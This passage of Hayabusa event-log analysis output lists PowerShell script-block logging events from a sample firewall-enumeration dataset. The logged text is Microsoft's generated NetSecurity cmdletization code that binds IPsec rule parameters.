Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter 
= Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } e,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType 
= 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 